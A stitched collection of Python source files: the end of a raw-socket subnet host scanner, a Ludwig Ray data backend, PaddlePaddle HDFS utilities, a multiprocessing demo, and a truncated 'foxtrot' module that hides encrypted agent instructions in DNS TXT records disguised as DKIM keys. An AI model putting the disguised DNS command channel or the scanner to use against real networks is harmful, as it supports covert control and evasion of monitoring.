raw_buffer = self.socket.recvfrom(65535)[0]
# create an IP header from the first 20 bytes
ip_header = IP(raw_buffer[0:20])
if ip_header.protocol == "ICMP":
# calculate where our ICMP packet starts in the raw packet.
# the ihl field counts 32-bit words (4-byte chunks), so ihl * 4 = size of the IP header in bytes
offset = ip_header.ihl * 4
# The 8 bytes after the IP header are the ICMP header, which holds the ICMP type and code. (https://www.juniper.net/documentation/images/ICMP2.gif)
buf = raw_buffer[offset:offset + 8]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
# Check for MESSAGE
if raw_buffer[len(raw_buffer) - len(MESSAGE):] == bytes(MESSAGE, 'utf8'):
target = str(ip_header.src_address)
if target != self.host and target not in alive_hosts:
alive_hosts.add(str(ip_header.src_address))
print(f'Host Up: {target}')
except KeyboardInterrupt:
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
print('\nUser Interrupted.')
if alive_hosts:
print(f'\n\nSummary: Hosts up on {SUBNET}')
for host in sorted(alive_hosts):
print(f'{host}')
print('')
sys.exit()
# mypacket = IP(buff)
# print(f'{mypacket.src_address} -> {mypacket.dst_address}')
if __name__ == '__main__':
if len(sys.argv) == 2:
host = sys.argv[1]
else:
host = '192.168.0.24'
# SUBNET = input('Enter the subnet <IP>/<SUBNET>: ')
# # Signature to check in ICMP responses
# MESSAGE = input('Enter the string to send in ICMP requests: ')
host_scan = Scanner(host)
time.sleep(5)
# Start a thread so the UDP sender does not interfere with the sniffer
t = threading.Thread(target=udp_sender)
t.start()
host_scan.sniff()
|
ray.py
|
#! /usr/bin/env python
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Any, Dict, Iterator, Union
import numpy as np
import pandas as pd
import ray
from pyarrow.fs import FSSpecHandler, PyFileSystem
from ray.data import read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.backend.base import Backend
from ludwig.constants import BINARY, CATEGORY, NAME, NUMBER, TYPE
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.fs_utils import get_fs_and_path
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray112 = LooseVersion(ray.__version__) >= LooseVersion("1.12")
_SCALAR_TYPES = {BINARY, CATEGORY, NUMBER}
def read_remote_parquet(path: str):
fs, path = get_fs_and_path(path)
return read_parquet(path, filesystem=PyFileSystem(FSSpecHandler(fs)))
class RayDataset(Dataset):
"""Wrapper around ray.data.Dataset."""
def __init__(
self,
df: Union[str, DataFrame],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
backend: Backend,
):
self.ds = backend.df_engine.to_ray_dataset(df) if not isinstance(df, str) else read_remote_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True, fully_executed=True) -> DatasetPipeline:
if not fully_executed and not _ray112:
raise ValueError(f"Cannot set fully_executed=False in ray {ray.__version__}")
if fully_executed and _ray112:
# set instance state so calls to __len__ will also use the fully_executed version
self.ds = self.ds.fully_executed()
pipe = self.ds.repeat()
if shuffle:
pipe = pipe.random_shuffle_each_window()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: Union[str, DataFrame], config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(dataset, get_proc_features(config), training_set_metadata, self.backend)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str,
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return "parquet"
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.features = features
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get("reshape")
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
features = self.features
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
# do not convert scalar columns: https://github.com/ray-project/ray/issues/20825
if features[c][TYPE] not in _SCALAR_TYPES:
df[c] = df[c].astype(TensorDtype())
elif features[c][TYPE] == BINARY:
# TODO(travis): figure out why Ray is converting these into object types by default
df[c] = df[c].astype(np.bool_)
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {c: batch[c].to_numpy() for c in self.columns}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=self.batch_size, batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
def producer():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=batch_size, batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in (
splits[i]
.map_batches(to_tensors, batch_format="pandas")
.iter_batches(prefetch_blocks=0, batch_size=batch_size, batch_format="pandas")
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
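# --- Added illustration (not part of the Ludwig backend) ---
# The async readers above decouple Ray's batch iteration from the consumer by
# pushing prepared batches through a bounded queue from a producer thread,
# with None as the end-of-epoch sentinel. This Ray-free sketch shows the same
# pattern over any iterable of batches; names are illustrative.
def _demo_async_reader(batches, maxsize=100):
    q = queue.Queue(maxsize=maxsize)

    def producer():
        for batch in batches:
            q.put(batch)  # blocks when the queue is full, giving backpressure
        q.put(None)       # sentinel: no more batches

    def consume():
        t = threading.Thread(target=producer, daemon=True)
        t.start()
        while True:
            batch = q.get(block=True)
            if batch is None:
                break
            yield batch
        t.join()

    return consume()
# Usage sketch: for batch in _demo_async_reader(range(5)): print(batch)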
|
hdfs_utils.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""hdfs_utils.py will move to fluid/incubate/fleet/utils/hdfs.py"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop configuration; must contain the \
keys "fs.default.name" and "hadoop.job.ugi"
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.items():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
_logger.warn(
'Times: %d, Error running command: %s. Return code: %d, Error: %s'
% (x, ' '.join(whole_commands), proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
"""
upload the local file to hdfs
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
retry_times(int|5): retry times
Returns:
True or False
"""
assert hdfs_path is not None
assert local_path is not None and os.path.exists(local_path)
if os.path.isdir(local_path):
_logger.warn(
"The local path: {} is a directory, which is not supported yet; returning".
format(local_path))
return False
base = os.path.basename(local_path)
if not self.is_exist(hdfs_path):
self.makedirs(hdfs_path)
else:
if self.is_exist(os.path.join(hdfs_path, base)):
if overwrite:
_logger.error(
"The HDFS path: {} exists and overwrite is True, deleting it".
format(hdfs_path))
self.delete(hdfs_path)
else:
_logger.error(
"The HDFS path: {} exists and overwrite is False, returning".
format(hdfs_path))
return False
put_commands = ["-put", local_path, hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(put_commands,
retry_times)
if returncode:
_logger.error("Put local path: {} to HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Put local path: {} to HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
_logger.info('Downloading %r to %r.', hdfs_path, local_path)
_logger.info('Download of %s to %r complete.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} does not exist".format(hdfs_path))
return False
if self.is_dir(hdfs_path):
_logger.error(
"The HDFS path: {} is a directory, which is not supported yet; returning".
format(hdfs_path))
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The local path: {} exists and overwrite is False, returning".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path does not exist: {}".format(
hdfs_path))
return False
else:
_logger.info("HDFS path exists: {}".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
whether the remote HDFS path exists
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} does not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} failed to delete".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} deleted successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
hdfs_src_path(str): source HDFS path.
hdfs_dst_path(str): destination HDFS path.
overwrite(bool|False): If the destination path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
if not self.is_exist(hdfs_src_path):
_logger.info("HDFS path does not exist: {}".format(hdfs_src_path))
if self.is_exist(hdfs_dst_path) and not overwrite:
_logger.error("HDFS path already exists: {} and overwrite=False".format(
hdfs_dst_path))
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
        Create a local directory, similar to mkdir -p.
        Args:
            local_path: local path where the directory will be created.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
        List directory contents of the HDFS hdfs_path.
        Args:
            hdfs_path(str): remote HDFS path to list.
        Returns:
            List: the contents of hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
            regex = re.compile(r'\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
        List directory contents of the HDFS hdfs_path recursively.
        Args:
            hdfs_path(str): remote HDFS path.
            only_file(bool|True): if True, folders are discarded.
            sort(bool|True): if True, results are sorted by creation time.
        Returns:
            List: the contents of hdfs_path.
"""
        def sort_by_time(item):
            # key function: parse the "YYYY-mm-dd HH:MM" timestamp column
            return datetime.strptime(item[1], '%Y-%m-%d %H:%M')
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
            regex = re.compile(r'\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
if sort:
                lines.sort(key=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
hdfs_path,
local_path,
trainer_id,
trainers,
multi_processes=5):
"""
Download files from HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
trainer_id(int): current trainer id
trainers(int): all trainers number
        multi_processes(int|5): number of concurrent download processes, default=5
    Returns:
        List: local paths of the downloaded files
"""
def __subprocess_download(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
sub_local_re_path = local_path
else:
sub_local_re_path = os.path.join(local_path, re_path)
client.download(data, sub_local_re_path)
assert isinstance(client, HDFSClient)
client.make_local_dirs(local_path)
_logger.info("Make local dir {} successfully".format(local_path))
all_need_download = client.lsr(hdfs_path, sort=True)
need_download = all_need_download[trainer_id::trainers]
_logger.info("Get {} files From all {} files need to be download from {}".
format(len(need_download), len(all_need_download), hdfs_path))
_logger.info("Start {} multi process to download datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = need_download[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_download, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to download datas".format(
multi_processes))
local_downloads = []
for data in need_download:
data_name = os.path.basename(data)
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
local_re_path = os.path.join(local_path, data_name)
else:
local_re_path = os.path.join(local_path, re_path, data_name)
local_downloads.append(local_re_path)
return local_downloads
def getfilelist(path):
    """Walk {path}, print every file found and return the list of file paths."""
    rlist = []
    for dir, folder, file in os.walk(path):
        for i in file:
            t = os.path.join(dir, i)
            rlist.append(t)
    for r in rlist:
        print(r)
    return rlist
def multi_upload(client,
hdfs_path,
local_path,
multi_processes=5,
overwrite=False,
sync=True):
"""
Upload files to HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
        multi_processes(int|5): number of concurrent upload processes, default=5
        overwrite(bool|False): whether to overwrite existing files on HDFS
        sync(bool|True): whether to upload files synchronously
Returns:
None
"""
def __subprocess_upload(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), local_path)
hdfs_re_path = os.path.join(hdfs_path, re_path)
client.upload(hdfs_re_path, data, overwrite, retry_times=5)
def get_local_files(path):
rlist = []
if not os.path.isdir(path):
return rlist
for dirname, folder, files in os.walk(path):
for i in files:
t = os.path.join(dirname, i)
rlist.append(t)
return rlist
assert isinstance(client, HDFSClient)
all_files = get_local_files(local_path)
if not all_files:
_logger.info("there are nothing need to upload, exit")
return
_logger.info("Start {} multi process to upload datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = all_files[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_upload, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to upload datas".format(
multi_processes))
if __name__ == "__main__":
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
    downloads = multi_download(
        client,
        "/user/com/train-25/model",
        "/home/xx/data1",
        1,
        5,
        multi_processes=5)
multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
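    # --- Hedged demo addition (paths are placeholders, like the ones above) ---
    # The single-file client API can be exercised directly as well; this is what
    # multi_download() does per file internally.
    if client.is_exist("/user/com/train-25/model/part-00000"):
        client.download("/user/com/train-25/model/part-00000", "/home/xx/data1")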
|
multiprocessing_interprocess_communication_IPC.py
|
import time
import multiprocessing
result = []
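# NOTE: this list lives in the parent process. The child process created below
# gets its own copy of the module globals, so appends made inside calc_square
# are not visible here -- which is exactly what the empty "result outside of
# process" output demonstrates. Use a multiprocessing.Queue, Pipe or shared
# Array/Value for real inter-process communication.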
def calc_square(numbers):
print('Calculating squares:')
for n in numbers:
print('square of {}: {}'.format(n, n * n))
result.append(n * n)
print('result within process: {}'.format(result))
if __name__ == '__main__':
arr = [2, 3, 8, 9]
start = time.time()
p1 = multiprocessing.Process(target=calc_square, args=(arr, ))
p1.start()
p1.join()
end = time.time()
print('result outside of process: {}'.format(result))
print('done in {} ms.'.format(str((end - start) * 1000)))
|
flib.py
|
from os import rename, path
from io import BytesIO
from random import randint
from time import sleep
import json
import tempfile
import os
import threading
from foxtrot.fconcmd import FConCommander
# DNS Resolver
import dns.resolver
import dns.update
import dns.query
import dns.tsigkeyring
from dns.tsig import HMAC_SHA256
# Crypto / encoding
from Cryptodome.Cipher import AES
from base64 import urlsafe_b64encode, urlsafe_b64decode
# FF Send-cli
# special thanks to https://github.com/ehuggett/send-cli
import sendclient.common
import sendclient.download
import sendclient.upload
# OS exec
# git clone https://github.com/kennethreitz/delegator.py ; python setup.py install
import delegator
class Foxtrot:
def __init__(self, config, logger):
self.flogger = logger
self.fconfig = config
        # Set the DNS resolver explicitly so we query the nameserver directly,
        # not the OS-default caching resolvers. Otherwise propagation delays and
        # TTLs can get in the way and give mixed results when trying to
        # update/add/delete records.
dns.resolver.default_resolver = dns.resolver.Resolver(configure=False)
dns.resolver.default_resolver.nameservers = [self.fconfig['nssrv']]
def fx_agent_dynrec(self, operation, domain, nssrv, selector, ttl, payload_b64, **tsig):
""" Manage Agent Dynamic DNS Record: CRUD"""
self.flogger.debug("Accepted for record: {0}, {1}, {2}, {3}, {4}, {5}, {6}".format(
operation, domain, nssrv, selector, ttl, payload_b64, tsig))
keyring = dns.tsigkeyring.from_text(tsig)
self.flogger.debug("DNS TSIG Keyring: " + str(keyring))
update = dns.update.Update(domain, keyring=keyring, keyalgorithm=HMAC_SHA256)
self.flogger.debug("DNS TXT Update: " + str(update))
# Make DKIM record look normal
dkim_record = '"v=DKIM1; h=sha256; k=rsa; t=y; s=email; p={0}"'.format(payload_b64)
# From http://www.dnspython.org/docs/1.14.0/dns.update.Update-class.html#add
if operation == 'add':
self.flogger.debug("DNS: Adding TXT record")
update.add(selector, ttl, dns.rdatatype.TXT, dkim_record)
else:
if operation == 'update':
self.flogger.debug("DNS: Updating TXT record")
update.replace(selector, ttl, dns.rdatatype.TXT, dkim_record)
else:
if operation == 'delete':
self.flogger.debug("DNS: Deleting TXT record")
update.delete(selector)
else:
self.flogger.error("DNS: Invalid record action: " + operation)
raise ValueError("Operation must be one of <add|update|delete>")
try:
response = dns.query.tcp(update, nssrv, timeout=10)
if response.rcode() == 0:
self.flogger.debug("DynDNS: Update Successful")
return True
else:
self.flogger.error("DynDNS: Update failed: code: {0}".format(response.rcode()))
self.flogger.error("Response: {0}".format(response))
return False
except dns.tsig.PeerBadKey as peerkey:
self.flogger.error("DNS TSIG: Bad Peer key {0}".format(peerkey))
return False
except Exception as e:
self.flogger.error("DNS: General Exception {0}".format(e))
return False
# After you add/update the record you can query the NS:
# Ex: dig @ns1.domain txt selector._domainkey.domain
# If you omit the @ns then DNS routing rules to get to
# your DNS via default resolver cache will apply
def fx_agent_ident(self, key, domain):
""" Return Agent identification """
return ".".join([key, "_domainkey", domain])
def fx_check_agent(self, key, domain):
""" Find and return DKIM selector for an agent if exists """
fqdnselector = self.fx_agent_ident(key, domain)
answer = None
try:
answers = dns.resolver.query(fqdnselector, 'TXT')
if len(answers) != 1:
answer = answers[0]
else:
answer = answers
self.flogger.debug("DNS Agent via record: {0}, TTL: {1}".format(
answer.qname, answer.rrset.ttl))
except dns.resolver.NXDOMAIN as nxdome:
self.flogger.debug("DNS Resolver exception: {0}".format(nxdome))
return answer
return answer
def fx_check_payload(self, key, domain):
"""Return DKIM payload verbatim for inspection """
data = ""
answer = self.fx_check_agent(key, domain)
if answer is not None:
for rdata in answer:
for txt in rdata.strings:
data = txt
return data
def fx_get_payload(self, key, domain):
""" Get Instruction from DNS Store"""
data = self.fx_check_payload(key, domain)
# Check data for validity
self.flogger.debug("DNS Record Content: {0} ".format(data))
dkim_rec = str(data).split(";")
payload_holder = dkim_rec[-1].strip()
self.flogger.debug("DNS Payload holder: " + payload_holder)
payload_b64 = payload_holder.split("p=")[-1]
self.flogger.debug("DNS Payload (B64 data): " + payload_b64)
recv_data = self.fx_pdec(key, payload_b64)
self.flogger.debug("Payload (decrypted data): " + recv_data)
return recv_data
def fx_penc(self, key, data):
""" Encrypt data w/key """
cipher = AES.new(key.encode(), AES.MODE_EAX)
ciphertext, tag = cipher.encrypt_and_digest(data.encode())
self.flogger.debug("ENC: Ciphertext type: {0}".format(type(ciphertext)))
self.flogger.debug("ENC: Ciphertext: {0}".format(str(ciphertext)))
# Use common format cross platform
ciphertext_b64 = urlsafe_b64encode(ciphertext)
self.flogger.debug("ENC: Ciphertext(b64): {0}".format(ciphertext_b64) )
self.flogger.debug("ENC: Nonce type: {0}".format(type(cipher.nonce)))
self.flogger.debug("ENC: Nonce: {0}".format(str(cipher.nonce)))
nonce_b64 = urlsafe_b64encode(cipher.nonce)
self.flogger.debug("ENC: Nonce(b64): {0}".format(nonce_b64))
self.flogger.debug("ENC: Tag type: {0}".format(type(tag)))
self.flogger.debug("ENC: Tag: {0}".format( str(tag)))
tag_b64 = urlsafe_b64encode(tag)
self.flogger.debug("ENC: Tag (B64) : {0}".format(tag_b64))
payload = b''.join([cipher.nonce, tag, ciphertext])
payload_b64 = urlsafe_b64encode(payload)
payload_b64_ascii = payload_b64.decode('ascii')
self.flogger.debug("ENC: Record payload (ASCII) : {0}".format(payload_b64_ascii))
return payload_b64_ascii
def fx_pdec(self, key, payload_b64_ascii):
""" Decrypt encoded and encrypted payload w/key """
payload = urlsafe_b64decode(payload_b64_ascii)
payload_stream = BytesIO(payload)
nonce, tag, ciphertext = [payload_stream.read(x) for x in (16, 16, -1)]
self.flogger.debug("DEC: Nonce type: {0}".format(type(nonce)))
self.flogger.debug("DEC: Nonce: {0}".format(str(nonce)))
cipher = AES.new(key.encode(), AES.MODE_EAX, nonce)
data = cipher.decrypt_and_verify(ciphertext, tag)
